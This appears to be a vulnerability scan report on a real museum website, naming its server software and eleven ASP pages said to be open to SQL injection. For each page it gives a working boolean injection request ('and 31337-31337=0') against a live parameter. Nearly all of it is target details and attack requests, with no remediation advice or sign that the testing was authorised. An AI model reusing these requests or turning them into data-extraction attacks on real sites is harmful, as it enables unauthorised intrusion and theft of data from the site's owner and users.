- Target: http://www.museoscienza.org/
- Server banner Microsoft-IIS/6.0
- Operating system Windows Web server IIS 6.0
- Technologies ASP.NET
- ========================================================================
- SQL injection
- Affected items
- /audio/audio.asp
- /dipartimenti/catalogo_collezioni/scheda_oggetto.asp
- /gallery/gallery.asp
- /leonardo/modelli/macchina-leo.asp
- /museoingiro/dettaglio.asp
- /myTest/vis_test.asp
- /news/dettaglio.asp
- /scuole/archivio_crei.asp
- /scuole/proposta_dett.asp
- /video/video.asp
- ex.:
- GET /audio/audio.asp?audio=42+and+31337-31337=0
- GET /dipartimenti/catalogo_collezioni/scheda_oggetto.asp?idk_in=ST060-00001'+and+31337-31337='0&arg=Astronomia
- GET /gallery/gallery.asp?gallery=139+and+31337-31337=0
- GET /leonardo/modelli/macchina-leo.asp?id_macchina=11+and+31337-31337=0
- GET /museoingiro/dettaglio.asp?id_mig=49+and+31337-31337=0&archivio=no
- GET /myTest/vis_test.asp?q=30+and+31337-31337=0
- GET /news/dettaglio.asp?idnotizia=549+and+31337-31337=0
- GET /scuole/archivio_crei.asp?provenienza=3+and+31337-31337=0
- GET /scuole/proposta_dett.asp?proposta=2&dip=9&sez=44+and+31337-31337=0&num=7
- GET /scuole/proposta_dett.asp?proposta=2&dip=9+and+31337-31337=0&sez=44
- GET /video/video.asp?video=64+and+31337-31337=0&cat=LEONARDO